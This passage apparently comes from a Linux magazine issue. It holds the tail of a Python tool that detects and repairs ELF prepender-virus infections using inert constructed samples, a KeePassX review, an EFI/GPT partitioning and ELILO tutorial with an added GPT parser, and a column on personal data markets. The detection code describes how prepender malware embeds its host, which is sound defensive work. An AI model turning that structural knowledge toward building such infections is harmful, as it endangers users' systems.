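    # Per the ELF specification: class 1/2 = 32/64-bit, data 1/2 = LSB/MSB.
    if hdr[EI_CLASS] not in (1, 2) or hdr[EI_DATA] not in (1, 2):
        return None
    if hdr[EI_VERSION] != 1:                # EV_CURRENT
        return None
    little = hdr[EI_DATA] == 1
    (e_type,) = struct.unpack("<H" if little else ">H", hdr[16:18])
    return {
        "class": 32 if hdr[EI_CLASS] == 1 else 64,
        "endian": "little" if little else "big",
        "type": E_TYPES.get(e_type, hex(e_type)),
    }


def has_trailing_marker(data, magic=MAGIC):
    """True if the last four bytes hold the marker (assumed little-endian int)."""
    return len(data) >= 4 and struct.unpack("<i", data[-4:])[0] == magic


def embedded_elf_offsets(data):
    """Offsets past 0 where another executable-type ELF header begins."""
    found = []
    pos = data.find(ELF_MAGIC, 1)
    while pos != -1:
        info = parse_ident(data, pos)
        # A bare "\x7fELF" string inside a binary fails the e_ident checks.
        if info and info["type"] in ("ET_EXEC", "ET_DYN"):
            found.append(pos)
        pos = data.find(ELF_MAGIC, pos + 1)
    return found


def triage(data):
    """Classify a file image: not-elf, clean, review or suspect-prepender."""
    if parse_ident(data) is None:
        return "not-elf"
    marker = has_trailing_marker(data)
    inner = embedded_elf_offsets(data)
    if marker and inner:
        return "suspect-prepender"
    if marker or inner:
        return "review"                     # one trace only: look by hand
    return "clean"


def recover_host(data):
    """Return the original program carried inside a suspect file, else None."""
    if triage(data) != "suspect-prepender":
        return None
    start = embedded_elf_offsets(data)[0]   # first embedded header = host start
    return data[start:-4]                   # drop prepended code and marker


def fake_elf(e_type, body):
    """Constructed stand-in: ELFCLASS32, little-endian, EV_CURRENT, then filler."""
    ident = ELF_MAGIC + bytes([1, 1, 1]) + bytes(9)
    return ident + struct.pack("<H", e_type) + body


# Constructed samples; the "prepended" part is inert filler, not real code.
HOST = fake_elf(2, b"original program bytes")
PREPENDED = fake_elf(2, b"V" * 40)
INFECTED = PREPENDED + HOST + struct.pack("<i", MAGIC)

if __name__ == "__main__":
    for name, blob in (("host", HOST), ("infected", INFECTED)):
        print(name, parse_ident(blob), triage(blob))
```

On real files, read each candidate with open(path, "rb").read() and pass the bytes to triage(); verify a recovered host against a known-good hash or package copy before putting it back.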
KeePassX: Keeping Your Passwords Safe

The advantages of using KeePassX as a secure and easy-to-use password manager.

ANTHONY DEAN

For a long time, my password tracking system was quite simplistic: hope I remembered the right passwords for each site or record them in an ordinary word-processor document. Such methods obviously have great flaws. I might have a hard time remembering a password for an infrequently used site, and a word-processor document isn’t the most secure place to store passwords. Such a system also tends to promote either too-simplistic passwords or recycling the same password across Web sites (both being easier to remember). For these and other reasons, I decided using a password manager would make my digital life a lot easier.

A password manager is a program that stores passwords. The stored passwords usually are encrypted for security purposes. Password managers can be either desktop-based (the password data stored in an encrypted database file on a hard drive), portable (similar to the desktop version, but stored on a smartphone or similar device) or on-line (data stored in an encrypted form on a trusted third-party Web site). Besides the increased security (over writing down passwords on a piece of paper or within an unencrypted text document, or resorting to memory), password managers also allow for more complex (thus, harder to guess/break) passwords to be created and stored. After some research, I decided to use KeePassX as my password manager of choice.
General Features

KeePassX is a multiplatform, open-source password manager. Unlike some password managers, KeePassX is desktop-based, which has its advantages and disadvantages. However, KeePassX can be used along with an on-line storage system, such as Dropbox (I discuss how to do that later in this article).

KeePassX comes with various features, including the ability to import and export passwords, search functionality, the ability to organize passwords/user names within predefined categories and a secure password generator. KeePassX also comes with a limited AutoType feature, or the ability to enter user name and/or password information automatically on a Web page from an entry.

Password information is stored in a database file protected with 256-bit encryption, which is compatible with other platforms’ versions of KeePassX (including KeePassDroid for Android smartphones, KeePass for Windows and so on). However, for compatibility, password files created by other versions must be stored in the older (version 1.x) format that KeePassX uses, versus the current (at the time of this writing) 2.x version, although work is being done to allow a future version of KeePassX to use the newer format.

Setup and Basic Usage

KeePassX is available in many repositories; thus, installation should follow standard procedures for your distro of choice.

Upon initial launch, KeePassX prompts the user to create a new database. As shown in Figure 1, the Set Master Key box will be displayed, asking one (by default) to create a master password for the database. You should choose a strong master password. An alternate option is to use a key file instead of or in addition to a password (more on key file usage later). For most of this article, however, I use only a master password for my examples.

Figure 1. The Set Master Key Box

After creating the password, the default main window (Figure 2) appears, displaying (in menus and a toolbar) most of KeePassX’s features.
The menus consist of File (importing and exporting database formats, saving changes to databases and so on); Entries (adding, deleting and making changes to entries, as well as copying entry information to the clipboard); Groups (organizing entry information into various categories); View (toolbar/entry information display settings); Extras (settings for KeePassX
itself, as well as the password generator); and Help (links to KeePassX’s Web site, FAQ list and so on).

Figure 2. The Main KeePassX Window

By default, two groups are created in a new database: Internet and Email. To create a new category, choose Groups→Add New Group, then enter the name of the new group in the Group Properties window that appears. You also can choose an icon for the new group from the pop-up menu. After finishing, select OK. The new category will appear in the left-hand pane.

To enter a new password and/or user name into KeePassX, select a category from the left-hand pane for the new password, then either select Entries→Add New Entry or choose Add New Entry from the toolbar. A New Entry window appears (Figure 3), allowing you to enter password and user name information, along with any other needed information. Additional information you can enter includes Title (a name for the entry); Username; Password; Repeat (enter the same password twice for verification); Comment (to enter comments about the entry); Expires (set an optional expiration date for the password); Attachment (attach a file to the entry); and Tools (a pop-up menu). A quality progress bar also is included under the password section, indicating the password’s relative strength.

Figure 3. The New Entry Window for Entering New User Names and Passwords

The Tools pop-up menu contains two options:

- AutoType: Customize sequence—customize the sequence of password/user name information entered into forms.
- AutoType: Select target window—select which application or browser window to enter password/user name information.
For extra security, the password can be shown or hidden (displaying asterisks) by clicking the eye icon next to the password entry boxes.

The password generator is available by clicking the Gen button within the New Entry window (or from Extras→Password Generator). A box as shown in Figure 4 appears. This feature allows you to create a random, strong password. Three tabs are available within the generator: Random, Pronounceable and Custom. Under Random, you can select various criteria for generating a password, based on types of characters used, uppercase or lowercase and so on. Under Pronounceable, some similar options to Random are available, although the selections here are to generate a password exclusively or near exclusively with letters. Finally, under Custom, an entry box is shown, allowing you to type in a word or phrase to define what characters are used to generate a password. The bottom of the password generator includes several features, such as setting the length of the password, a password bit strength indicator and use of an entropy generator. The entropy generator creates a random set of data (based on keyboard activity or mouse movement) upon which to base generated passwords.

Figure 4. KeePassX’s Password Generator

The Expire option in the New Entry window allows you to set a date indicating how long the password should last. This can serve as a reminder to change passwords regularly for extra security. To view which passwords already have expired, select Extras→Show Expired Entries.

To use a stored user name or password, KeePassX has two options: either copy the information from KeePassX and paste it into the required entry areas, or select the AutoType feature. To copy the information, select either Copy Username to Clipboard or Copy Password to Clipboard from the toolbar, or choose the same-named options under the Entries menu.
For AutoType, select Entries→Perform AutoType while the browser is open to the desired login page; the information will be entered automatically.

To lock KeePassX from others’ use (such as when you step away from the computer), select File→Lock Workspace,
or select Lock Workspace from the toolbar. To unlock KeePassX, select the Unlock button displayed, and enter the database’s master password. For more privacy, an option also exists to hide passwords and/or user names. Go to View and select Hide Usernames and/or Hide Passwords. Asterisks will be displayed in place of the user names and/or passwords.

Figure 5. KeePassX’s Main Window, with an Entry Displayed

Figure 6. An Entry with User Name and Password Information Hidden
If you have multiple databases to manage, KeePassX also offers a bookmark feature. To bookmark a database file, select File→Bookmarks, and choose either Add Bookmark (to bookmark a database file) or Bookmark This Database (to bookmark the presently open database). The bookmarks then will appear under the Bookmarks menu. There’s also a Manage Database option to manage existing bookmarks.

To import or export database files, go to File and select Import from or Export to. Import formats besides KeePassX include PwManager and KWallet. Export formats include KeePassX and a text file.

Advanced Use: Cloud-Based Database File Storage and Smartphone Access

Figure 7. A Dropbox Directory, Containing a Password Database

One popular advanced use for KeePassX is to keep a password database stored in an on-line storage medium, such as Dropbox. Besides serving as a means of database backup, this also lets you access and update a password file from any number of devices, including
smartphones. This is done using KeePassX’s sibling versions for various smartphone OSes, including the version I use here, KeePassDroid for Android smartphones. (Instructions should be similar for those with iOS, Windows or BlackBerry smartphones.)

To start, access (or create if you don’t have one) your Dropbox account. Then, move the database file to your Dropbox directory (Figure 7). Next, open KeePassX and select File→Open Database (or Open Database from the toolbar). Select the database file from your Dropbox folder, and then enter your master password and use KeePassX as usual.

To set up your Android smartphone to access the password database, install KeePassDroid (and, if not already installed, the Android Dropbox app) from the Android Market. Next, launch Dropbox, and select the database file. KeePassDroid then launches and opens the file, displaying a master password entry box. After entering the master password, a smartphone-friendly interface showing the various password groups will be displayed. Functions are available for going to an entered URL, as well as copying and pasting a user name and password. Entering or modifying user names and/or passwords also is offered by KeePassDroid, which will update the database file stored on Dropbox (and, of course, allow you to access the new information from KeePassX on a desktop).

As shown previously, this allows KeePassX to have some of the functionality of an on-line password manager, while maintaining the advantages of being desktop-based. Although I’ve not tried it, this method should be similar (available smartphone app permitting) for other cloud-based storage systems, such as Ubuntu One (which also has an Android app available).

Encryption

KeePassX offers two types of 256-bit encryption: AES and Twofish. The type of encryption used may be changed by accessing File→Database Settings. AES is the default, and although Twofish may be used, it’s compatible only with KeePassX’s version 1.x database format.
Therefore, it’s probably best to leave this option as the default.

Key File

Instead of a master password, a database can be opened using a key file. A key file is a file that stores data (such as a master password or random data), and it is stored elsewhere (on the same hard drive, on a USB drive and so on). One advantage of a key file instead of a master password is that an actual file is required to open the database. Because the key file can be stored elsewhere (such as on a separate USB drive), this also serves as a security option. Another advantage is that a key file may contain lengthy or complex data. However, one
downside is that anyone who finds the key file can open the database, similar to somebody that discovers the master password. Also, if the key file is lost (or damaged, deleted or anything similar) or if any information in the file is changed, opening the database will be impossible.

For extra security, both a master password and a key file may be required for accessing a database.

To use a key file, under File→Change Master Key (or in the Set Master Key window, if initially creating a database), select the key file check box. If a desired key file doesn’t already exist, select Generate Key File to create one, then select a name and storage location for the file. To open the database using a key file, select the check box next to key file (and the check box next to password too if required), and click Browse. Browse to wherever the key file is stored, select it, then select OK to open the database.

Differences between KeePassX and LastPass

Another popular password manager is LastPass. Unlike KeePassX, LastPass is proprietary instead of open source, and it relies on a cloud-based solution (storing encrypted password information on-line). LastPass comes as a plugin for most browsers and is compatible with Linux. Similar features to KeePassX include password generation and an ability to fill in login information for Web sites. However, some advanced features, including support for smartphones and removing advertising, require upgrading to a $12/year “premium” version. LastPass also requires Internet access for its full cloud-based use, which might be an issue for some.

Conclusion

KeePassX is a very useful and valuable password manager.
Its storage capabilities and strong password generator have helped me greatly improve my on-line security over my former password-tracking methods. KeePassX’s cross-platform compatibility also provides versatility in conjunction with its sibling application KeePassDroid. Although there are other good password managers, KeePassX in particular is worth trying.

Anthony Dean works as a freelance writer and file clerk in Milwaukee, Wisconsin, and he has been a Linux user since 2005. Anthony may be reached through his Web site at http://www.anthonynotes.com.

Resources

KeePassX: http://www.keepassx.org
KeePassX FAQ: http://www.keepassx.org/faq
KeePassDroid: http://www.keepassdroid.com
LastPass: http://lastpass.com
INDEPTH

Using Linux with EFI, Part II: Preparing to Install on an EFI Computer

How to identify your firmware and partition your disk before installing Linux on an EFI computer. RODERICK W. SMITH

In my last article (December 2011), I described some of the key characteristics of the Extensible Firmware Interface (EFI) and its second-generation variant, Unified EFI (UEFI). To recap, EFI (I use this acronym to refer to either variant generically) is the replacement for the elderly Basic Input/Output System (BIOS) firmware that most PCs have used for 30 years. EFI provides a number of improvements over BIOS, but the most important from a Linux perspective is that EFI systems boot in a manner very different from BIOS systems. This fact necessitates the use of different bootloaders, or at least different versions of bootloaders—some are available for both BIOS and EFI systems.

This article continues the EFI story by describing the preparatory steps you should take prior to installing Linux on an EFI-based computer. Specifically, you should know how to identify your firmware and how to partition your disk. Although most installers set up an EFI bootloader, I also describe ELILO configuration here. This knowledge may help you get a recalcitrant installer to boot.

This series continues with two more parts, which cover actual Linux installation procedures and maintenance of a Linux system that’s been installed in EFI mode, respectively.

Identifying Your Firmware

Before proceeding with EFI-specific
preparations for installation, you may want to verify that your firmware is (or is not) EFI-capable. As noted in Part I, this task isn’t always simple, because many computers use EFI, but don’t advertise the fact, and use firmware interfaces that look just like those on old-style BIOSes. Many manufacturers call their EFI firmwares “BIOSes”, and they often ship with BIOS-compatibility modes that enable them to boot OSes using legacy BIOS bootloaders. (This feature sometimes is referred to as the Compatibility Service Module, or CSM.) Some steps you can take to identify your firmware’s capabilities include the following:

- Check your model: all Intel-based Macs are EFI-based. So are most (perhaps all) PCs based on Intel’s Sandy Bridge CPUs, which began shipping in quantity in the spring of 2011. AMD-based systems based on EFI started to become popular in mid-2011. Some models from before 2011 also are EFI-enabled, although they’re rarer.
- Check the manual: read your computer or motherboard’s manual—particularly the section on boot options. If there are references to “EFI” or “UEFI” boot modes, those modes enable EFI boot capabilities. If the firmware includes a “legacy” boot mode, that option refers to BIOS boot capabilities, the implication being that the normal boot mode uses EFI. The lack of any such option might mean your firmware is a conventional BIOS; however, some systems lack any explicit options on this score. You can search for these terms using a PDF version of the manual, which most manufacturers make available on their Web sites.
- Check your boot options: even if the manual makes no explicit mention of EFI, UEFI or legacy boot options, such options may be present in the boot menu in your computer’s firmware setup utility. There also can be a clue in the form of multiple options to boot a single medium.
For instance, if I insert an optical disc that’s bootable in EFI mode into a computer based on an Intel DG43NB motherboard and then press F10 at boot time, the boot menu includes two options to boot from my DVD drive. One is labeled “PATA: HP DVD Writer 1040r”, and the other is labeled “INTERNAL EFI SHELL: HP DVD Writer 1040r”. The first boots the disc in BIOS mode, and the second boots the disc in EFI mode.

- Check your boot state: you can try booting the computer and then check the status of the boot mode (I’ll
describe this in Part III of this series).

- Check your Windows installation: Windows ties its partition table type to its firmware type. It installs only to GUID Partition Table (GPT) disks in UEFI mode and only to Master Boot Record (MBR) disks in BIOS mode. Thus, if a working Windows installation uses GPT, you can be sure that your firmware includes UEFI support. If the disk is in MBR mode, you can be sure your firmware includes BIOS support. Such a system also might support UEFI boots, but if you intend to keep booting Windows, it’s probably best to treat it like a BIOS computer.

If you’ve identified your firmware as supporting EFI, you can proceed with partitioning your disk and preparing for your Linux installation.

Partitioning a Disk for EFI

Most EFI-based computers use the GPT partitioning system. Although it’s possible to boot an EFI-based computer using the older MBR system, such a configuration is unusual. Most Linux distributions use GPT automatically when they install in EFI mode; however, it’s sometimes easier to install in BIOS mode and then switch to EFI mode for booting the computer. If you do so, you may need to pre-partition the disk explicitly using GPT before installing the OS. You also may want to pre-partition your disk so that you can set up certain details in the ways you want.

In Linux, you can use either of two families of tools to partition a disk using GPT:

- The libparted family: tools based on libparted support both MBR and GPT, but MBR is normally the default. To use GPT on a blank disk, you must tell the tool explicitly to create a GPT disk label. In GNU Parted, the command to do this on /dev/sda is parted /dev/sda mklabel gpt. Using GParted, you should select the Device→Create Partition Table menu option, click the Advanced button in the resulting dialog box (Figure 1), select “gpt” as the partition table type, and click the Apply button.
- The GPT fdisk family: you can use gdisk, cgdisk or sgdisk to prepare a GPT disk.
These tools use GPT by default, so you don't need to do anything special to do the job. They’re designed to work like the Linux fdisk tools, but for GPT disks. (Note: I’m the author of the GPT fdisk tools.)

Whatever tool you use, you can partition your disks much as you would using MBR on a BIOS-based computer, but with a few twists:

- To boot in EFI mode, most EFI-based computers require an EFI System Partition (ESP). This partition should
have a FAT-32 filesystem, which you may need to create with mkdosfs. I recommend creating a 200 MiB to 300 MiB ESP as the first partition on the disk. To create an ESP using a libparted-based tool, create a normal FAT-32 partition and then set the “boot flag” on this partition. To create an ESP with GPT fdisk, create a partition and set its type code to 0xEF00.

Figure 1. You must tell GParted explicitly to use GPT when creating a new partition table.

- To boot in BIOS mode using GRUB 2, it’s helpful to have a BIOS Boot Partition. This partition can be tiny—as small as 32 KiB, although 1 MiB is a more common size. In a libparted-based tool, you can create a partition without a filesystem and then set the bios_grub flag on it. In GPT fdisk, create a partition and set its type code to 0xEF02. If you plan to do a pure EFI installation, a BIOS Boot Partition isn’t necessary; however, if you have to fall back to a BIOS-mode installation followed by a change to EFI mode, a BIOS Boot Partition can be helpful. Therefore, I recommend you create one.
- Some OSes, such as OS X, like to see gaps of about 128 MiB between their partitions. Thus, you may want to create your disk with such gaps, particularly after Hierarchical File System Plus (HFS+) partitions on a Mac.
- If you’re dual-booting between Windows and Linux, you should be aware that in the past, Linux installations used the Windows filesystem type code on GPT disks for Linux partitions. This practice resulted in Linux partitions showing up as unpartitioned Windows disks inside Windows—a potentially dangerous situation! Versions of GPT fdisk since 0.7.2 have provided a new type code (0x8300) to use for Linux partitions to avoid this problem. This type code will be supported in future versions of libparted too, and it will be used by default, but this support is not yet available, as of libparted 3.0.0.
You can use GPT fdisk to change the type code after installing Linux if you want to make Linux partitions invisible to a dual-booted Windows installation.

One of the advantages of GPT over MBR is that GPT lacks the distinction between primary, extended and logical partitions. Instead, GPT supports up to 128 partitions by default, all of which act like MBR primary partitions.

If you use a libparted-based tool to partition, be aware that what such tools
refer to as a “boot flag” on GPT disks is actually the type code for an ESP. You should not set this flag on anything but the ESP. This contrasts with MBR disks, on which the “boot flag” must sometimes be set on an OS partition that holds a bootloader.

Configuring ELILO

Each of the four Linux EFI-capable bootloaders described in Part I of this series (ELILO, Fedora’s patched GRUB Legacy, GRUB 2 and Linux kernel patches) requires its own configuration. Describing all of them is beyond the scope of this series, so I’ve chosen just one to describe in detail: ELILO. I selected ELILO because it’s widely available, easy to configure and reliable. You may not need to configure ELILO; if your distribution installs something else and it works, you may as well stick with what it installs. Even if you need to install ELILO, you may not need to do so until after you install your distribution. I describe it here because it’s sometimes necessary to install ELILO before installing Linux in order to get the installer to boot in EFI mode.

You can obtain an ELILO tarball from the main ELILO Web site (see Resources), or you may be able to use a package that’s provided with your distribution. A distribution-provided package may be hard to use if you need to install ELILO before installing your distribution though.

You should begin by creating a home for ELILO on your ESP. Several possible homes exist:

- You can store the binary in the EFI/BOOT directory as bootx64.efi.
This makes ELILO run as the default bootloader if you haven’t configured your EFI to know about any others. If a file of this name already exists though, be sure to back it up!

- Distributions normally place the elilo.efi file in a subdirectory named after themselves, such as EFI/BOOT/suse for OpenSUSE.
- If you multiboot with other OSes, you may want to create a directory called EFI/elilo and store elilo.efi there. This placement, however, will require that you use the efibootmgr utility or a similar feature in the EFI’s user interface to add ELILO to the EFI’s boot manager.

Which approach works best depends on your needs and system. If your ESP doesn’t contain any other bootloaders, the default EFI/BOOT/bootx64.efi filename usually works well. If you can boot your Linux installer in EFI mode and run efibootmgr, using another name may work.

A complete ELILO installation on the ESP will include at least four files:

- elilo.efi or bootx64.efi: this file is the ELILO binary. You must copy it to the ESP from
the ELILO package. (It’s called elilo-{version}-{arch}.efi inside the main ELILO package file, where {version} is the version number and {arch} is an architecture code.)

- elilo.conf: this is the ELILO configuration file, which I describe in more detail shortly.
- A Linux kernel file: ELILO loads the Linux kernel from the ESP, so you normally place this file in the ELILO directory.
- A Linux initial RAM disk file: ELILO loads this file, like the kernel, from the ESP.

You can store more than one kernel and initial RAM disk on the ESP if you want to have a choice of kernels or if you multiboot multiple distributions, each of which has its own kernel and initial RAM disk.

The ELILO configuration file’s format is similar to that of LILO, the BIOS bootloader (Listing 1).

Listing 1. A Sample ELILO Configuration File

    prompt
    timeout=50
    default=kernel304
    #chooser=textmenu

    image=vmlinuz-2.6.38-8-generic
        label=linux
        initrd=initrd.img-2.6.38-8-generic
        read-only
        root=/dev/seeker/u1104
        append="reboot=a,w"

    image=bzImage-3.0.4
        label=kernel304
        initrd=initrd.img-3.0.4
        read-only
        root=/dev/seeker/u1104
        append=""

The first few lines of Listing 1 set global ELILO options:

- prompt tells ELILO to show a prompt at boot time rather than to boot straight into the default kernel.
- timeout=50 sets the timeout period to 5 seconds. Note that the timeout period is measured in tenths of a second.
- default=kernel304 sets the default kernel to the one labeled kernel304. ELILO boots this kernel if the timeout period passes without a key press from the user.
- chooser=textmenu sets the user interface style to a menu rather than a prompt at which you must type an entry. This option seems to be broken
though; it’s always produced a blank display for me, although it accepts key presses as I’d expect. Therefore, I’ve commented it out by placing a hash mark (#) at the start of its line.

Listing 1 presents two stanzas following the global options. Each stanza describes one kernel that ELILO can boot. Each stanza consists of several lines:

- image= identifies the Linux kernel file, which normally appears in the same directory as the elilo.efi file.
- label= gives the stanza a name. ELILO should display this name in its menu if you use the chooser=textmenu option, or you can type this name at the ELILO prompt when using the default option. The name must not contain spaces.
- initrd= identifies the initial RAM disk file.
- read-only is a standard part of the configuration.
- root= identifies the Linux root (/) filesystem. Listing 1 shows a root filesystem on a Logical Volume Manager (LVM) configuration, but if you don’t use LVM, you’ll probably specify a regular device filename, such as /dev/sda3, or identify a device by UUID, as in root=UUID=c607bd95-8edf-4eb1-aa93-12db8f0e66a2.
- append= enables you to add arbitrary kernel options. The first stanza in Listing 1 uses the reboot=a,w option, which works around problems on some systems that cause the computer to hang when rebooted. Many distributions use additional options to enable graphical boot displays or other features. You often can omit such options, but sometimes they’re necessary for proper functioning.

If you copy the files into EFI/BOOT and rename elilo.efi to bootx64.efi, you may be able to reboot into ELILO. If you copy the files into another directory though, you may need to use the efibootmgr program to add ELILO to the ESP’s list of bootloaders. This program will work only if the computer already is booted in EFI mode. You must type this command on the computer on which you want to use it; it stores data in the computer’s NVRAM, not on the hard disk.
To use it, you would type a command like the following:

    efibootmgr -c -l \\EFI\\elilo.efi -L ELILO

This command adds the EFI/elilo.efi file to the EFI’s bootloader list, using the menu name ELILO. Note that you must use a double backslash (\\) as a directory separator, and the filename is
relative to the ESP. You can use additional efibootmgr commands to control the order of entries in the EFI’s boot list, to delete items from the list and so on. (Part IV of this series will describe these options in more detail.)

If you’re having problems booting your distribution’s installer in EFI mode, you can set up ELILO on your hard disk, copying the kernel and initial RAM disk from the installer’s disc image to the ESP and creating an elilo.conf file that references them. I’ve found such tricks to be very useful in the past, although as I’ll describe in Part III, the latest round of distributions has greatly improved EFI support, so with any luck, you won’t need to do this.

Once it’s properly installed and booted, ELILO presents a simple prompt:

    ELILO boot:

Press the Enter key to boot the default kernel, press the Tab key to see a list of options, or type an option name to boot it.

Next Time

Part III of this series covers OS installation using two methods: direct EFI installations and converting a BIOS-mode installation to boot in EFI mode.

Correction to Part I

In Part I of this series (December 2011 issue), due to a tagging error, the text that read “The old MBR partition system is limited to 232 sectors, which works out to 2 TiB on disks with 512-byte sectors. GPT uses 64-bit pointers, so its limit is 264 sectors, or 8 ZiB (zebibytes).”, should have been “The old MBR partition system is limited to 2^32 sectors, which works out to 2 TiB on disks with 512-byte sectors. GPT uses 64-bit pointers, so its limit is 2^64 sectors, or 8 ZiB (zebibytes).” LJ apologizes for the error.

Roderick W. Smith is a Linux consultant, writer and open-source programmer living in Woonsocket, Rhode Island.
He is the author of more than 20 books on Linux and other open-source technologies, as well as of the GPT fdisk (gdisk, cgdisk and sgdisk) family of partitioning software.

Resources

You can read about and obtain GPT fdisk (gdisk, cgdisk and sgdisk) from http://www.rodsbooks.com/gdisk if your distribution doesn’t provide it.

ELILO is based at http://elilo.sourceforge.net.

Apple’s Technical Note 2166 (http://developer.apple.com/library/mac/technotes/tn2166) details OS X’s requirements for partitioning, which may be important to know when installing Linux on a Mac.
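The partition type codes from "Partitioning a Disk for EFI" (0xEF00, 0xEF02, 0x8300) can be checked on an existing disk image before an installer runs. The following is an added example, not code from the article or from GPT fdisk: it parses the primary GPT, verifies both CRC32 values and reviews the layout against the article's advice. The function names, the 512-byte sector size and the two sample images (constructed in memory) are assumptions of this example.

```python
"""Added example: parse a GPT and review it against the article's layout advice."""
import struct
import uuid
import zlib

SECTOR = 512                               # assumption: 512-byte logical sectors
MIB = 1024 * 1024
HDR = struct.Struct("<8sIIIIQQQQ16sQIII")  # 92-byte GPT header at LBA 1
ENT = struct.Struct("<16s16sQQQ72s")       # 128-byte partition entry

# Partition type GUID -> GPT fdisk type code as used in the article
CODES = {
    uuid.UUID("C12A7328-F81F-11D2-BA4B-00A0C93EC93B"): "EF00",  # EFI System Partition
    uuid.UUID("21686148-6449-6E6F-744E-656564454649"): "EF02",  # BIOS Boot Partition
    uuid.UUID("0FC63DAF-8483-4772-8E79-3D69D8477DE4"): "8300",  # Linux filesystem
    uuid.UUID("EBD0A0A2-B9E5-4433-87C0-68B6B72699C7"): "0700",  # Microsoft basic data
}
GUIDS = {code: guid for guid, code in CODES.items()}


def parse_gpt(img):
    """Return [(number, code, first_lba, last_lba, name)]; ValueError if damaged."""
    sector = img[SECTOR:2 * SECTOR]
    if len(sector) < SECTOR or sector[:8] != b"EFI PART":
        raise ValueError("no GPT header at LBA 1 (MBR or blank disk?)")
    f = HDR.unpack_from(sector)
    hsize, hcrc, ent_lba, nent, esize, ecrc = f[2], f[3], f[10], f[11], f[12], f[13]
    if not HDR.size <= hsize <= SECTOR or esize < ENT.size:
        raise ValueError("implausible header or entry size")
    # The header CRC32 is calculated with its own field (offset 16) zeroed.
    if zlib.crc32(sector[:16] + bytes(4) + sector[20:hsize]) != hcrc:
        raise ValueError("GPT header CRC mismatch")
    table = img[ent_lba * SECTOR:ent_lba * SECTOR + nent * esize]
    if len(table) != nent * esize or zlib.crc32(table) != ecrc:
        raise ValueError("partition entry array CRC mismatch")
    parts = []
    for i in range(nent):
        tguid, _uniq, first, last, _attr, name = ENT.unpack_from(table, i * esize)
        if tguid == bytes(16):
            continue  # unused slot
        code = CODES.get(uuid.UUID(bytes_le=tguid), "????")  # GUIDs are mixed-endian
        label = name.decode("utf-16-le", errors="replace").rstrip("\0")
        parts.append((i + 1, code, first, last, label))
    return parts


def review_layout(parts):
    """Return warnings derived from the partitioning advice in the article."""
    warnings = []
    esps = [p for p in parts if p[1] == "EF00"]
    if not esps:
        warnings.append("no EFI System Partition (EF00)")
    else:
        num, _code, first, last, _name = esps[0]
        size = (last - first + 1) * SECTOR
        if num != 1:
            warnings.append(f"ESP is partition {num}, not the first partition")
        if size < 200 * MIB:
            warnings.append(f"ESP is {size // MIB} MiB; the article recommends 200-300 MiB")
    if not any(p[1] == "EF02" for p in parts):
        warnings.append("no BIOS Boot Partition (EF02) for a GRUB 2 BIOS-mode fallback")
    for num, code, *_rest in parts:
        if code == "0700":
            warnings.append(f"partition {num} uses the Windows type code (0700); "
                            "if it holds Linux data, retype it to 8300")
    return warnings


def build_image(layout):
    """Build a constructed, minimal image (primary GPT only) for the demonstration."""
    table = bytearray(128 * ENT.size)
    for i, (code, first, last, name) in enumerate(layout):
        ENT.pack_into(table, i * ENT.size, GUIDS[code].bytes_le,
                      uuid.uuid4().bytes_le, first, last, 0, name.encode("utf-16-le"))
    fields = [b"EFI PART", 0x00010000, HDR.size, 0, 0, 1, 0, 34, 0,
              uuid.uuid4().bytes_le, 2, 128, ENT.size, zlib.crc32(bytes(table))]
    fields[3] = zlib.crc32(HDR.pack(*fields))
    return bytes(SECTOR) + HDR.pack(*fields).ljust(SECTOR, b"\0") + bytes(table)


# Constructed layouts (LBAs in 512-byte sectors): one follows the advice, one does not.
GOOD = [("EF00", 2048, 514047, "ESP"), ("EF02", 514048, 516095, "BIOS boot"),
        ("8300", 516096, 42459135, "root")]
RISKY = [("0700", 2048, 4196351, "root"), ("EF00", 4196352, 4401151, "ESP")]

if __name__ == "__main__":
    for title, layout in (("GOOD", GOOD), ("RISKY", RISKY)):
        parts = parse_gpt(build_image(layout))
        print(title, [p[1] for p in parts], review_layout(parts) or "no warnings")
```

To review a real disk, pass the first 34 sectors of the device (read with root privileges) to parse_gpt instead of a constructed image.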
EOF

DOC SEARLS

Is There a “Personal Data Economy” If You Control Your Own Data?

What happens to the market for personal data when persons actually control their own?

One year ago this month, the World Economic Forum put out a report titled “Personal Data: The Emergence of a New Asset Class”. Investopedia defines asset class as “a group of securities that exhibit similar characteristics, behave similarly in the marketplace, and are subject to the same laws and regulations. The three main asset classes are equities (stocks), fixed-income (bonds) and cash equivalents (money market instruments)”, and it adds, “It should be noted that in addition to the three main asset classes, some investment professionals would add real estate and commodities, and possibly other types of investments, to the asset class mix.”

Is personal data any of those things? If anything, it’s one of those “other types of investments”, but is it a security in any sense? Investopedia says “a security is essentially a contract that can be assigned a value and traded”. Examples include “a note, stock, preferred share, bond, debenture, option, future, swap, right, warrant, or virtually any other financial asset”.

Well, it’s clearly a financial asset—just not for you. That’s because the asset is data about you—not your data you own, personally.

According to the Winterberry Group, “Marketing Data & Related Services Spending” in the US will be $7.8 billion this year. Most of that is for direct mail, where spending has been declining over recent years. The growth market is spending on data guiding digital media: on-line and e-mail. That won’t reach a $billion this year, but it will soon enough.
The big spending aims toward what has long been a holy grail of advertising: delivering messages that are perfectly personalized and perfectly timed. Right now, they call this “customer-centric messaging”, “content-optimized interactions”, “right-time decisioning” and stuff like that. The fantasy is that this will be welcomed by individuals. The reality is that it’s creepy.

Advertising always has been guesswork—the more accurate, the better. But once advertising on digital media becomes perfectly personal and perfectly timed, is it still advertising? No, it’s a robot with bad manners.

But the fantasy is alive and well, so the market for data about you is still there, and growing. What can you do about it?

There are several approaches. One is to
create a market for personal data that you participate in. Statz (https://www.statz.com/Sell/Statz_Take_Control_and_Own_Your_Data.aspx), for example, calls itself The Data Marketplace, and it gives you this pitch:

Benefit From the Data Economy

You may not even know it, but you’re in the data business. Data about your phone calls, prescriptions, home energy use, purchases, investments and more is being sold every day. Without your permission or profit.

Statz lets you gather all your behavior, product usage, and activity data—FREE—and participate in the consumer-data market, anonymously and securely. And make money.

Other companies—Personal.com, Connect.me, Mydex.org, Trustfabric.com, Azigo.com, Singly.com—also work in various ways to protect your personal data (or, in the case of Connect.me, your reputation), though none have Statz’ business model. (Not exactly, anyway. They’re all different.)

All in various ways either use or develop open-source code. For Linux Journal readers, Singly stands out for its open-source pedigree and growth vectors. It was cofounded by Jeremie Miller of Jabber and XMPP fame. Last year, they also brought in Matt Zimmerman as CTO. He was the founding CTO of Ubuntu. The code bases to check out and contribute to are the Locker Project (http://lockerproject.org) and TeleHash (http://telehash.org).

